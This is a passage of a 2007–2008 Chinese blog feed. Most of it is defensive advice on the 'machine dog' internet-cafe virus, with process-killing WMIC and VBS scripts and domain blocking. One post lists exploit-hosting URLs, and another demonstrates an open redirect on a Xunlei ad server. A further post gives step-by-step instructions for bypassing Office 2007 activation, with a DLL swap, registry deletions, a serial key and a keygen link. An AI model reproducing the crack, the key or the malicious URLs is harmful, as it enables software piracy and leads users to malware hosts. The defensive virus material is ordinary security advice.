后来，为了防止目录被删掉，有些强人更是出怪招，在pcihdd.sys目录下再建个怪异的目录名，形如&#8221;ty&#8230;/&#8221;的目录。这个目录用批处理是可以建立的，但是不可删除。同样，建了这个目录，pcihdd.sys目录也就不可删除了。<br />
在后期变种中，病毒不再使用pcihdd.sys的这文件为驱动，改成了其他的文件名，比如笔者今天发现的变种，驱动名就是<strong>comint32.sys</strong>..<br />
这样子看来，基于文件名的防疫方式宣告失败。有人还在不停的建那些怪异目录，以图防疫机器狗病毒。可这样子下去，你的系统里为增添多少**目录？你最后，你自己也没法删除这些**，甚至不得不格式化硬盘。</p>
<p><strong>封域名，封IP</strong><br />
早期机器狗病毒，可以通过简单的反汇编工具，找到相应的下载病毒的网址。后期的机器狗病毒变种，也可通过查看中毒机器的IE临时文件找到下载病毒的网址。<br />
机器狗病毒被各种检测方式很快被找到了，其ip地址和域名也能被发现。于是，在服务器或路由器里封掉这些域名或IP，的确可以有效防治它。然而，恶梦不会因此而结束。据笔者自身封的IP和域名，目前加起来已多达三十多个。还不包括每天都要新的域名或IP被以各种方式发现出来。<br />
ROS里脚本在无限的加长些，路由器里的列表也就无限的增长着。这样的日子，我们看不到尽头在哪儿。</p>
<p><strong>两行批处理</strong>，问题看是搞定，但也治标不治本</p>
<p>随着对机器狗病毒研究的深入，大家都一致发现了问题的关键在于userinit.exe和usrinit.exe（后期变种）文件。基于这点出发，可以使用以下两个批处理搞定问题：</p>
<p><font color="#0000ff">wmic process where name=&#8221;userinit.exe&#8221; call terminate<br />
wmic process where name=&#8221;usrinit.exe&#8221; call terminate</font><br />
这是批处理高手写的，果然非同反响。<font color="#ff6600">该代码的的意思是：当发现进程里有userinit.exe时，即关闭；当发现进程里有usrinit.exe时，也关闭。因为批处理在winlogon后运行，所以病毒刚启动，就被杀掉了。这样也就失去了下载其它病毒的机会。</font>不过，缺点是它只运行一次。这两代批处理的基础上，加入了每秒检查进程，一发现即终止的vbs脚本：</p>
<p><font color="#0000ff">do while(1)<br />
strComputer = &#8220;.&#8221;<br />
Set objWMIService = GetObject(&#8220;winmgmts:&#8221; _<br />
&amp; &#8220;{impersonationLevel=impersonate}!\\&#8221; &amp; strComputer &amp; &#8220;\root\cimv2&#8243;)</p>
<p>Set colProcessList1 = objWMIService.ExecQuery _<br />
(&#8220;Select * from Win32_Process Where Name = &#8216;userinit.exe&#8217;&#8221;)<br />
For Each objProcess1 in colProcessList1<br />
objProcess1.Terminate()<br />
Next</p>
<p>Set colProcessList2 = objWMIService.ExecQuery _<br />
(&#8220;Select * from Win32_Process Where Name = &#8216;usrinit.exe&#8217;&#8221;)<br />
For Each objProcess2 in colProcessList2<br />
objProcess2.Terminate()<br />
Next</p>
<p>Set colProcessList3 = objWMIService.ExecQuery _<br />
(&#8220;Select * from Win32_Process Where Name = &#8216;conime0.exe&#8217;&#8221;)<br />
For Each objProcess3 in colProcessList3<br />
objProcess3.Terminate()<br />
Next</p>
<p>Wscript.Sleep(1000)<br />
Loop</font><br />
<font color="#ff6600">这段vbs脚本的机制和以上两段代码有异曲同工之妙。</font>不过，用了无限循环语句，实现了对进程的动态监控，使得被监控进程无法运行。<br />
然而，无论如何，这也依然是治标（userinit.exe）的方法，而非治本（内核驱动被加载，并成功穿透还原软件）的方法。</p>
<p>各大公司，各其奇谋，其中不泛有高手中的高手。给出的方案也是切中要害，一针见血的。</p>
<p>第一节 从底层防病毒-内核也玩驱动过滤</p>
<p>这招首推南京小哨兵公司推出的机器狗防疫补丁。通过安装该补丁侦察得知，该防疫补丁在内核驱动中加入了相关文件，并在进程里进行了监听，便于软件补丁的升级。早期的防疫补丁可能有缺陷，会造成系统死机等现象，以及防不了变种等。由于其不断更新，防疫级别在系统底层，应该是值得信赖的。<br />
<font color="#ff0000">小哨兵官方网站：http://www.sentry.com.cn，时常关注，应该能下载到最新的防疫补丁</font></p>
<p>第二节 从系统引导文件NTLDR下手</p>
<p>NTLDR是xp系统的内核级引导文件，关于它的介绍如下：</p>
<p>深入Win XP之认识神秘的引导文件NTLDR</p>
<p>NTLDR一般存放于C盘根目录下，是一个具有隐藏和只读属性的系统文件。它的主要职责是解析Boot.ini文件。如果你对它的理解还不是很清楚，那么下面我们就以Windows XP为例介绍NTLDR在系统引导过程中的作用。<br />
Windows XP在引导过程中将经历预引导、引导和加载内核三个阶段，这与Windows 9X直接读取引导扇区的方式来启动系统是完全不一样的，NTLDR在这三个阶段的引导过程中将起到至关重要的作用。</p>
<p>1．预引导阶段</p>
<p>在预引导阶段里计算机所做的工作有：运行POST程序，POST将检测系统的总内存以及其他硬件设备的状况，将磁盘第一个物理扇区加载到内存，加载硬盘主引导记录并运行，主引导记录会查找活动分区的起始位置。接着活动分区的引导扇区被加载并执行，最后从引导扇区加载并初始化NTLDR文件。</p>
<p>2．引导阶段</p>
<p>在引导阶段中，Windows XP将会依次经历初始引导加载器阶段、操作系统选择阶段、硬件检测阶段以及配置选择阶段这四个小的阶段。</p>
<p>（1）在初始引导加载器阶段中，NTLDR将把计算机的微处理器从实模式转换为32位平面内存模式，在实模式中，系统会为MS－DOS预留640KB 大小的内存空间，其余的内存都被看做是扩展内存，在32位平面模式中系统将所有内存都视为可用内存，然后NTLDR执行适当的小型文件系统驱动程序，这时 NTLDR可以识别每一个用NTFS或FAT格式的文件系统分区，至此初始引导加载器阶段结束。</p>
<p>（2）当初始引导加载器阶段结束后将会进入操作系统选择阶段，如果计算机上安装了多个操作系统，由于NTLDR加载了正确的Boot.ini文件，那么在启动的时候将会出现要求选择操作系统的菜单，NTLDR正是从boot.ini文件中查找到系统文件的分区位置。如果选择了NT系统，那么NTLDR 将会运行NTDETECT.COM文件，否则NTLDR将加载BOOTSECT.DOS，然后将控制权交给BOOTSECT.DOS。如果 Boot.ini文件中只有一个操作系统或者其中的timeout值为0，那么将不会出现选择操作系统的菜单画面，如果Boot.ini文件非法或不存在，那么NTLDR将会尝试从默认系统卷启动系统。</p>
<p>小提示：NTLDR启动后，如果在系统根目录下发现有Hiberfil.sys文件且该文件有效，那么NTLDR将读取Hiberfil.sys文件里的信息并让系统恢复到休眠以前的状态，这时并不处理Boot.ini文件。</p>
<p>（3）当操作系统选择阶段结束后将会进入硬件检测阶段，这时NTDETECT.COM文件将会收集计算机中硬件信息列表，然后将列表返回到NTLDR，这样NTLDR将把这些硬件信息加载到注册表“HKEY_LOCAL_MACHINE”中的Hardware中。</p>
<p>（4）硬件检测阶段结束后将会进入配置选择阶段，如果有多个硬件配置列表，那么将会出现配置文件选择菜单，如果只有一个则不会显示。</p>
<p>3．加载内核阶段</p>
<p>在加载内核阶段中，NTLDR将加载NTOKRNL.EXE内核程序，然后NTLDR将加载硬件抽象层(HAL.dll)，接着系统将加载注册表中的 “HKEY_MACHINESystem”键值，这时NTLDR将读取“HKEY_MACHINESystemselect”键值来决定哪一个 ControlSet将被加载。所加载的ControlSet将包含设备的驱动程序以及需要加载的服务。再接着NTLDR加载注册表 “HKEY_LOCAL_MACHINESystemservice”下的start键值为0的底层设备驱动。当ControlSet的镜像 CurrentControlSet被加载时，NTLDR将把控制权传递给NTOSKRNL.EXE，至此引导过程将结束。</p>
<p>小提示：如果在启动的时候按F8键，那么我们将会在启动菜单中看到多种选择启动模式，这时NTLDR将根据用户的选择来使用启动参数加载NT内核，用户也可以在Boot.ini文件里设置启动参数。<br />
通过修改这一特殊文件，达到防疫机器狗病毒的，首推转转游戏公司。它修改这一文件，并将userinit.exe文件改名为www.ceelsoft.com.userinit文件名，并置入根目录下，达到防疫冰点被穿透的目的。具体细节，得问他们公司的技术人员了。<font color="#ff0000">转转最新机器狗补丁下载：</p>
<p>http://www.ceelsoft.com/nb/proxy/www/new0.htm</font></p>
<p>第三节 系统补丁还必须得都打上</p>
<p>系统漏洞给病毒提供可乘之机的例子，可谓举不胜举。可是，还是有些网吧网管兄弟图个简便，图个懒，做个系统，N年都懒得管他。由于系统补丁未能及时打上，给病毒提供可利用的漏洞，大开方便之门，类似于机器狗病毒泛滥也就不奇怪了。</p>
<p>笔者实测显示，默认安装完windows Xp SP2后，到今天为止，还必须给系统打上多达七十多个补丁。这么多的补丁，哪怕有一个没打好，都有可能给病毒带来机会。</p>
<p>第四节 插件，应用软件漏洞也不得不防</p>
<p>IE插件，各类流氓软件，以及以各种形式安装的控件，都有可能给系统带来新的漏洞。这一点，恐怕我们以前从未意识到。有些兄弟在做完系统后，甚至都懒得清理一下系统里这些**残渣。很多免费软件，都会多少默认安装一些插件或流邙软件，以图一点广告经济利益。而做完系统，又没能很好的清理之，就给系统带来漏洞。百度搜霸就是个很好的例子.</p>
<p>另外，一些应用软件的漏洞，也给病毒提供了可乘之机。诸如本文提到迅雷，realplay，以及通过ppstream（也可以说它是IE插件）这些常用软件等。这些软件的漏洞，往往不会引起注意。然而，他们带来的灾难，不亚于系统漏洞。通过本文先前给出的源码，不难看出这一点.</p>
<p>第五节 全网大检查</p>
<p>现在你可以，也应该对你管理的局域网络进行全面大检查了。检查你的系统是否中了机器狗病毒，是否存有以上提到的那些漏洞，检查你是否都打好了各种防穿透补丁和防疫补丁。</p>
<hr /><h2>Related posts:</h2><ul><li><a href="http://clin003.com/ideas/xcopy-1456/" rel="bookmark" title="Permanent Link: 对比文件日期更新(XCOPY) 网吧批处理运用2">对比文件日期更新(XCOPY) 网吧批处理运用2</a></li><li><a href="http://clin003.com/netbar/arp-deception-and-the-rogue-virus-immune-simple-batch-scripts-bat-422/" rel="bookmark" title="Permanent Link: arp欺骗和机器狗病毒简单免疫批处理脚本(bat)">arp欺骗和机器狗病毒简单免疫批处理脚本(bat)</a></li></ul><hr /><small>Copyright &copy; 2007-2010<br /> This feed is building by <a href="http://clin003.com/">Lin's Space|Only</a> .<br />本文地址：<a href="http://clin003.com/safe/immune-dog-363/" >http://clin003.com/safe/immune-dog-363/</a> <br /> <a href="http://clin003.com/safe/immune-dog-363/#comment" title="to the comments">雁过留言</a>. (Digital Fingerprint: 850cee8la75i9f3ne9c0dd80e31392be)</small>]]></content:encoded>
			<wfw:commentRss>http://clin003.com/safe/immune-dog-363/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>刚刚我把bbs.clin003.com删掉啦</title>
		<link>http://clin003.com/about/del-bbs-clin003-com-336/</link>
		<comments>http://clin003.com/about/del-bbs-clin003-com-336/#comments</comments>
		<pubDate>Mon, 07 Jan 2008 15:22:44 +0000</pubDate>
		<dc:creator>白菜林</dc:creator>
				<category><![CDATA[关于空间]]></category>
		<category><![CDATA[安全]]></category>
		<category><![CDATA[clin003.com]]></category>

		<guid isPermaLink="false">http://wz.mygogou.com/about/del-bbs-clin003-com-336.shtml</guid>
		<description><![CDATA[感觉没必要设个论坛，也没多少心思去照顾论坛，而且还要想着程序是不是需要打补丁！ 如果有什么问题，我还是希望能在wiki中提出。 留个纪念截个图，现在还能访问我想应该是服务器缓存在起作用，图片都已经不能显示啦。 Related posts:Google page rank更新（2008-05-01）今日杂碎：Google想把我K啦还是在换血把访问其他主机名地址重定向到指定主机名(域名)决定正式启用clin003.com域名：域名变更今天圆宵节Copyright &#169; 2007-2010 This feed is building by Lin's Space&#124;Only .本文地址：http://clin003.com/about/del-bbs-clin003-com-336/ 雁过留言. (Digital Fingerprint: 850cee8la75i9f3ne9c0dd80e31392be)]]></description>
			<content:encoded><![CDATA[<p>感觉没必要设个论坛，也没多少心思去照顾论坛，而且还要想着程序是不是需要打补丁！</p>
<p>如果有什么问题，我还是希望能在wiki中提出。</p>
<p>留个纪念截个图，现在还能访问我想应该是服务器缓存在起作用，图片都已经不能显示啦。</p>
<p><a href="http://clin003.com/about/del-bbs-clin003-com-336/attachment/bbsclin003com/" rel="attachment wp-att-337" title="bbs.clin003.com"><img src="http://clin003.com/wp-content/uploads/2008/01/bbsclin003com.thumbnail.jpg" alt="bbs.clin003.com" /></a></p>
<hr /><h2>Related posts:</h2><ul><li><a href="http://clin003.com/about/google-pagerank-2008-05-01-1095/" rel="bookmark" title="Permanent Link: Google page rank更新（2008-05-01）">Google page rank更新（2008-05-01）</a></li><li><a href="http://clin003.com/about/googlezaizuoshenme-1701/" rel="bookmark" title="Permanent Link: 今日杂碎：Google想把我K啦还是在换血">今日杂碎：Google想把我K啦还是在换血</a></li><li><a href="http://clin003.com/search-engine/url-redirection-from-all-to-one-directory-name-1975/" rel="bookmark" title="Permanent Link: 把访问其他主机名地址重定向到指定主机名(域名)">把访问其他主机名地址重定向到指定主机名(域名)</a></li><li><a href="http://clin003.com/about/www-clin003-com-390/" rel="bookmark" title="Permanent Link: 决定正式启用clin003.com域名：域名变更">决定正式启用clin003.com域名：域名变更</a></li><li><a href="http://clin003.com/ideas/yuanxiaojie-454/" rel="bookmark" title="Permanent Link: 今天圆宵节">今天圆宵节</a></li></ul><hr /><small>Copyright &copy; 2007-2010<br /> This feed is building by <a href="http://clin003.com/">Lin's Space|Only</a> .<br />本文地址：<a href="http://clin003.com/about/del-bbs-clin003-com-336/" >http://clin003.com/about/del-bbs-clin003-com-336/</a> <br /> <a href="http://clin003.com/about/del-bbs-clin003-com-336/#comment" title="to the comments">雁过留言</a>. (Digital Fingerprint: 850cee8la75i9f3ne9c0dd80e31392be)</small>]]></content:encoded>
			<wfw:commentRss>http://clin003.com/about/del-bbs-clin003-com-336/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>被al.99.vc使用js挂马解决办法</title>
		<link>http://clin003.com/safe/al-99-vc-use-was-linked-to-ma-solution-js-333/</link>
		<comments>http://clin003.com/safe/al-99-vc-use-was-linked-to-ma-solution-js-333/#comments</comments>
		<pubDate>Mon, 07 Jan 2008 10:32:08 +0000</pubDate>
		<dc:creator>白菜林</dc:creator>
				<category><![CDATA[安全]]></category>
		<category><![CDATA[网吧经验谈]]></category>
		<category><![CDATA[al.99.vc]]></category>
		<category><![CDATA[Arp]]></category>
		<category><![CDATA[挂马]]></category>
		<category><![CDATA[病毒]]></category>

		<guid isPermaLink="false">http://wz.mygogou.com/safe/al-99-vc-use-was-linked-to-ma-solution-js-333.shtml</guid>
		<description><![CDATA[al.99.vc挂马分析与解决建议 修改系统盘：C:\WINDOWS\system32\drivers\etc＼host（用记事本打开）文件添加这句可以临时解决再次中这个站的木马病毒 127.0.0.1 al.99.vc 屏蔽这个网站就可以啦 。。。 http://w18.vg/real.gif貌似感染real，如果你有ｒｅａｌｏｎｅ建议卸掉或者去官方下载最新的版本装上。如果你看到ｒｅａｌｏｎｅ不是有错误提示说明你的ｒｅａｌｏｎｅ有漏洞。 http://w18.vg/ms.gif这个貌似只有ｉｅ７才会被中上。所以建议你打上最新的ｉｅ补丁。 http://w18.vg/baidu.gif百度搜霸的漏洞利用，建议直接卸掉就可以啦。或者升级你的搜霸。 http://w18.vg/x1.gif这个已经为404页啦不清楚是什么 http://w18.vg/lz.gif利用的是glchat的漏洞是一个聊天工具 http://w18.vg/bf.gif暴风影音的漏洞利用，建议去下载新的暴风影音 如果个人机子建议打开病毒实时检测功能。 如果你有更好的建议，谢谢分享。 Related posts:安装office 2007企业版然后提示激活解决办法ASP.NET 安全策略学习与 .NET 测试环境搭建25个顶级PHP模板引擎超过一百多个web2.o在线生成器Copyright &#169; 2007-2010 This feed is building by Lin's Space&#124;Only .本文地址：http://clin003.com/safe/al-99-vc-use-was-linked-to-ma-solution-js-333/ 雁过留言. (Digital Fingerprint: 850cee8la75i9f3ne9c0dd80e31392be)]]></description>
			<content:encoded><![CDATA[<p><a href="http://wiki.mygogou.com/doc-view-844.html" target="_blank">al.99.vc挂马分析与解决建议</a></p>
<p><font size="-1">修改系统盘：C:\WINDOWS\system32\drivers\etc＼host（用记事本打开）文件添加这句可以临时解决再次中这个站的木马病毒</font></p>
<p><font size="-1">127.0.0.1 <strong>al.99.vc</strong></font></p>
<p>屏蔽这个网站就可以啦</p>
<p>。。。</p>
<p>http://w18.vg/real.gif貌似感染real，如果你有ｒｅａｌｏｎｅ建议卸掉或者去官方下载最新的版本装上。如果你看到ｒｅａｌｏｎｅ不是有错误提示说明你的ｒｅａｌｏｎｅ有漏洞。</p>
<p>http://w18.vg/ms.gif这个貌似只有ｉｅ７才会被中上。所以建议你打上最新的ｉｅ补丁。</p>
<p>http://w18.vg/baidu.gif百度搜霸的漏洞利用，建议直接卸掉就可以啦。或者升级你的搜霸。</p>
<p>http://w18.vg/x1.gif这个已经为404页啦不清楚是什么</p>
<p>http://w18.vg/lz.gif利用的是glchat的漏洞是一个聊天工具</p>
<p>http://w18.vg/bf.gif暴风影音的漏洞利用，建议去下载新的暴风影音</p>
<p>如果个人机子建议打开病毒实时检测功能。</p>
<p>如果你有更好的建议，谢谢分享。</p>
<hr /><h2>Related posts:</h2><ul><li><a href="http://clin003.com/safe/2007-enterprise-edition-installation-of-office-then-suggested-that-activation-solution-245/" rel="bookmark" title="Permanent Link: 安装office 2007企业版然后提示激活解决办法">安装office 2007企业版然后提示激活解决办法</a></li><li><a href="http://clin003.com/servers/security-fuard-solution-of-aspdotnet-1806/" rel="bookmark" title="Permanent Link: ASP.NET 安全策略学习与 .NET 测试环境搭建">ASP.NET 安全策略学习与 .NET 测试环境搭建</a></li><li><a href="http://clin003.com/suggested-contents/top-25-php-template-engines-155/" rel="bookmark" title="Permanent Link: 25个顶级PHP模板引擎">25个顶级PHP模板引擎</a></li><li><a href="http://clin003.com/suggested-contents/more-than-100-web-20-online-generators-104/" rel="bookmark" title="Permanent Link: 超过一百多个web2.o在线生成器">超过一百多个web2.o在线生成器</a></li></ul><hr /><small>Copyright &copy; 2007-2010<br /> This feed is building by <a href="http://clin003.com/">Lin's Space|Only</a> .<br />本文地址：<a href="http://clin003.com/safe/al-99-vc-use-was-linked-to-ma-solution-js-333/" >http://clin003.com/safe/al-99-vc-use-was-linked-to-ma-solution-js-333/</a> <br /> <a href="http://clin003.com/safe/al-99-vc-use-was-linked-to-ma-solution-js-333/#comment" title="to the comments">雁过留言</a>. (Digital Fingerprint: 850cee8la75i9f3ne9c0dd80e31392be)</small>]]></content:encoded>
			<wfw:commentRss>http://clin003.com/safe/al-99-vc-use-was-linked-to-ma-solution-js-333/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>很显然pplive的广告业务中有跨站漏洞（迅雷：cknum.xunlei.com）</title>
		<link>http://clin003.com/exploits/pplive-ad-host-cknum-xunlei-com-298/</link>
		<comments>http://clin003.com/exploits/pplive-ad-host-cknum-xunlei-com-298/#comments</comments>
		<pubDate>Fri, 04 Jan 2008 01:17:33 +0000</pubDate>
		<dc:creator>白菜林</dc:creator>
				<category><![CDATA[互联网]]></category>
		<category><![CDATA[安全]]></category>
		<category><![CDATA[漏洞]]></category>
		<category><![CDATA[pplive]]></category>
		<category><![CDATA[广告]]></category>
		<category><![CDATA[跨站漏洞]]></category>
		<category><![CDATA[迅雷]]></category>

		<guid isPermaLink="false">http://wz.mygogou.com/exploits/pplive-ad-host-cknum-xunlei-com-298.shtml</guid>
		<description><![CDATA[http://cknum.xunlei.com/fcg-bin/cgi_banner_stat.fcg?url=http://wz.mygogou.com/直接打开这个链接就会转到本博客。 这个（cknum.xunlei.com）是pplive的一个广告服务器(频道)。 还不清楚pplive和迅雷是不是只是广告上的合作。 pplive的广告服务器地址有： cknum.xunlei.com cop.my.xunlei.com biz5.sandai.net pt.cga.com.cn pp.pplive.com Related posts:Firefox代理使用办法某局对谷歌音乐下手啦？今日杂碎：邮件原来是迅雷惹的祸今日杂碎：域名纠错——>域名劫持Copyright &#169; 2007-2010 This feed is building by Lin's Space&#124;Only .本文地址：http://clin003.com/exploits/pplive-ad-host-cknum-xunlei-com-298/ 雁过留言. (Digital Fingerprint: 850cee8la75i9f3ne9c0dd80e31392be)]]></description>
			<content:encoded><![CDATA[<p><a href="http://cknum.xunlei.com/fcg-bin/cgi_banner_stat.fcg?url=http://wz.mygogou.com/">http://cknum.xunlei.com/fcg-bin/cgi_banner_stat.fcg?url=http://wz.mygogou.com/</a>直接打开这个链接就会转到本博客。</p>
<p>这个（cknum.xunlei.com）是pplive的一个广告服务器(频道)。</p>
<p>还不清楚pplive和迅雷是不是只是广告上的合作。</p>
<p>pplive的广告服务器地址有：</p>
<p>cknum.xunlei.com</p>
<p>cop.my.xunlei.com<br />
biz5.sandai.net<br />
pt.cga.com.cn<br />
pp.pplive.com</p>
<hr /><h2>Related posts:</h2><ul><li><a href="http://clin003.com/internet/firefox-using-proxy-433/" rel="bookmark" title="Permanent Link: Firefox代理使用办法">Firefox代理使用办法</a></li><li><a href="http://clin003.com/ideas/ping-google-music-by-g-top100-cn-1442/" rel="bookmark" title="Permanent Link: 某局对谷歌音乐下手啦？">某局对谷歌音乐下手啦？</a></li><li><a href="http://clin003.com/ideas/send-email-1557/" rel="bookmark" title="Permanent Link: 今日杂碎：邮件">今日杂碎：邮件</a></li><li><a href="http://clin003.com/internet/xunlei-config-373/" rel="bookmark" title="Permanent Link: 原来是迅雷惹的祸">原来是迅雷惹的祸</a></li><li><a href="http://clin003.com/ideas/cncmax-domain-name-hijacking-1547/" rel="bookmark" title="Permanent Link: 今日杂碎：域名纠错——>域名劫持">今日杂碎：域名纠错——>域名劫持</a></li></ul><hr /><small>Copyright &copy; 2007-2010<br /> This feed is building by <a href="http://clin003.com/">Lin's Space|Only</a> .<br />本文地址：<a href="http://clin003.com/exploits/pplive-ad-host-cknum-xunlei-com-298/" >http://clin003.com/exploits/pplive-ad-host-cknum-xunlei-com-298/</a> <br /> <a href="http://clin003.com/exploits/pplive-ad-host-cknum-xunlei-com-298/#comment" title="to the comments">雁过留言</a>. (Digital Fingerprint: 850cee8la75i9f3ne9c0dd80e31392be)</small>]]></content:encoded>
			<wfw:commentRss>http://clin003.com/exploits/pplive-ad-host-cknum-xunlei-com-298/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>安装office 2007企业版然后提示激活解决办法</title>
		<link>http://clin003.com/safe/2007-enterprise-edition-installation-of-office-then-suggested-that-activation-solution-245/</link>
		<comments>http://clin003.com/safe/2007-enterprise-edition-installation-of-office-then-suggested-that-activation-solution-245/#comments</comments>
		<pubDate>Sat, 29 Dec 2007 02:10:37 +0000</pubDate>
		<dc:creator>白菜林</dc:creator>
				<category><![CDATA[安全]]></category>
		<category><![CDATA[技术分析]]></category>
		<category><![CDATA[推荐,内容]]></category>
		<category><![CDATA[office 2007]]></category>
		<category><![CDATA[OGACheckControl]]></category>
		<category><![CDATA[激活]]></category>

		<guid isPermaLink="false">http://wz.mygogou.com/suggested-contents/%e5%ae%89%e8%a3%85office-2007%e4%bc%81%e4%b8%9a%e7%89%88%e7%84%b6%e5%90%8e%e6%8f%90%e7%a4%ba%e6%bf%80%e6%b4%bb%e8%a7%a3%e5%86%b3%e5%8a%9e%e6%b3%95-245.shtml</guid>
		<description><![CDATA[安装了office 2007企业版，有个序列号，安装完成以后要 激活，郁闷！网上都说是卸载后，再安装免激活的版本，其实没有这么麻烦。 1、到微软官方网站进行Office正版验证，地址是：http://www.microsoft.com/genuine/default.aspx?displaylang=zh-cn，呵呵，验证记过当然是盗版了，没关系，下载 （OGACheckControl）这个dll文件，替换掉c:\windows\system32\下面的同名文件。这个文件必须是你进行验证才会生成的。还有替换的时候记得关闭IE浏览器。 2、开始&#8211;运行&#8211;输入“regedit”打开注册表，找到HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\12.0\Registration\ 将所有{90120000-0030-0000-0000-0000000FF1CE}类似名下的DigitalProductID，ProductID键值删除。 3，打开word，此时，提示你输入序列号， 输入可以用的序列号然后立即安装就可以在一分钟之内激活office2007啦就可以啦 这里提供些个能用的序列号： V9MTG-3GX8P-D3Y4R-68BQ8-4Q8VD 也可以用这个序列号生成器： Related posts:去除Office onenote 2007的激活验证和试用版标记从pdf图片中抓取文字Visual C++ 2008 Feature Pack BetaOffice 2007又复活啦windows的的墨水服务『office2007的Microsoft Office Document Image安装』Copyright &#169; 2007-2010 This feed is building by Lin's Space&#124;Only .本文地址：http://clin003.com/safe/2007-enterprise-edition-installation-of-office-then-suggested-that-activation-solution-245/ 雁过留言. (Digital Fingerprint: 850cee8la75i9f3ne9c0dd80e31392be)]]></description>
			<content:encoded><![CDATA[<p>安装了office 2007企业版，有个序列号，安装完成以后要 激活，郁闷！网上都说是卸载后，再安装免激活的版本，其实没有这么麻烦。</p>
<p>1、到微软官方网站进行Office正版验证，地址是：<font face="Courier New"><a href="http://www.microsoft.com/genuine/default.aspx?displaylang=zh-cn">http://www.microsoft.com/genuine/default.aspx?displaylang=zh-cn</a></font>，呵呵，验证记过当然是盗版了，没关系，<a href="http://wz.mygogou.com/sa/OGACheckControl.rar"><span style="color: #ff6600">下载</span></a> （<a rel="attachment wp-att-255" href="http://wz.mygogou.com/safe/2007-enterprise-edition-installation-of-office-then-suggested-that-activation-solution-245.shtml/ogacheckcontrol-2/" title="OGACheckControl">OGACheckControl</a>）这个dll文件，替换掉c:\windows\system32\下面的同名文件。这个文件必须是你进行验证才会生成的。还有替换的时候记得关闭IE浏览器。</p>
<p>2、开始&#8211;运行&#8211;输入“regedit”打开注册表，找到HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\12.0\Registration\<br />
将所有{90120000-0030-0000-0000-0000000FF1CE}类似名下的DigitalProductID，ProductID键值删除。</p>
<p>3，打开word，此时，提示你输入序列号， 输入可以用的序列号然后立即安装就可以在一分钟之内激活office2007啦就可以啦</p>
<p>这里提供些个能用的序列号：</p>
<p>V9MTG-3GX8P-D3Y4R-68BQ8-4Q8VD</p>
<p>也可以用这个<a href="http://wz.mygogou.com/sa/Office2007suanhaoqi.rar">序列号生成器</a>：</p>
<hr /><h2>Related posts:</h2><ul><li><a href="http://clin003.com/suggested-contents/office-onenote-2007-miyue-quchujihuoyanzheng-1963/" rel="bookmark" title="Permanent Link: 去除Office onenote 2007的激活验证和试用版标记">去除Office onenote 2007的激活验证和试用版标记</a></li><li><a href="http://clin003.com/technical-analysis/pdf-crawl-from-the-text-in-the-picture-1007/" rel="bookmark" title="Permanent Link: 从pdf图片中抓取文字">从pdf图片中抓取文字</a></li><li><a href="http://clin003.com/suggested-contents/visual-c-2008-feature-pack-beta-343/" rel="bookmark" title="Permanent Link: Visual C++ 2008 Feature Pack Beta">Visual C++ 2008 Feature Pack Beta</a></li><li><a href="http://clin003.com/ideas/office-2007-also-resurrected-1421/" rel="bookmark" title="Permanent Link: Office 2007又复活啦">Office 2007又复活啦</a></li><li><a href="http://clin003.com/technical-analysis/windows-ink-services-platform-tablet-input-subsystem-1004/" rel="bookmark" title="Permanent Link: windows的的墨水服务『office2007的Microsoft Office Document Image安装』">windows的的墨水服务『office2007的Microsoft Office Document Image安装』</a></li></ul><hr /><small>Copyright &copy; 2007-2010<br /> This feed is building by <a href="http://clin003.com/">Lin's Space|Only</a> .<br />本文地址：<a href="http://clin003.com/safe/2007-enterprise-edition-installation-of-office-then-suggested-that-activation-solution-245/" >http://clin003.com/safe/2007-enterprise-edition-installation-of-office-then-suggested-that-activation-solution-245/</a> <br /> <a href="http://clin003.com/safe/2007-enterprise-edition-installation-of-office-then-suggested-that-activation-solution-245/#comment" title="to the comments">雁过留言</a>. (Digital Fingerprint: 850cee8la75i9f3ne9c0dd80e31392be)</small>]]></content:encoded>
			<wfw:commentRss>http://clin003.com/safe/2007-enterprise-edition-installation-of-office-then-suggested-that-activation-solution-245/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>E2手机病毒?</title>
		<link>http://clin003.com/exploits/e2-phone-menu-215/</link>
		<comments>http://clin003.com/exploits/e2-phone-menu-215/#comments</comments>
		<pubDate>Sun, 16 Dec 2007 08:45:43 +0000</pubDate>
		<dc:creator>白菜林</dc:creator>
				<category><![CDATA[今日一点]]></category>
		<category><![CDATA[安全]]></category>
		<category><![CDATA[推荐,内容]]></category>
		<category><![CDATA[漏洞]]></category>
		<category><![CDATA[E2]]></category>
		<category><![CDATA[复位]]></category>
		<category><![CDATA[安全密码]]></category>
		<category><![CDATA[手机病毒]]></category>
		<category><![CDATA[菜单]]></category>

		<guid isPermaLink="false">http://wz.mygogou.com/exploits/e2-phone-menu-215.shtml</guid>
		<description><![CDATA[漫不经心的打开主菜单，天!竞只剩固定拨号，神州行，，几个图标!我的第一感觉就是中病毒啦?不太可能吧!一个小小的e2?难到是昨晚电用完时的非法关机。试着关机开机几遍都没作用。奇怪啦，快捷键都能用(可以重新设置，只能看见应用程序，看不见系统设置类的菜单!)，就是从主菜单没法找到!，最后终于在侧面语音功能中找到&#8221;复位&#8221;菜单，只有删除全部的复位功能把主菜单找回来啦，感谢ing，不过代价是短信，通信录等手机上存的资料统统丢失，内存卡上的软件要重新下过用设置依然。明白啦e2安全密码是在手机复位时用到和锁定密码不同! Related posts:Testing phone post看到技术文章很稀奇——张翼：跳出PC局限用手机授权防御木马Gmail要求手机验证怎么办 (国家列表中没有China)手机嗅探扫描，窃&#8230;Fedora 11 下硬盘安装(升级)到 Fedora 12Copyright &#169; 2007-2010 This feed is building by Lin's Space&#124;Only .本文地址：http://clin003.com/exploits/e2-phone-menu-215/ 雁过留言. (Digital Fingerprint: 850cee8la75i9f3ne9c0dd80e31392be)]]></description>
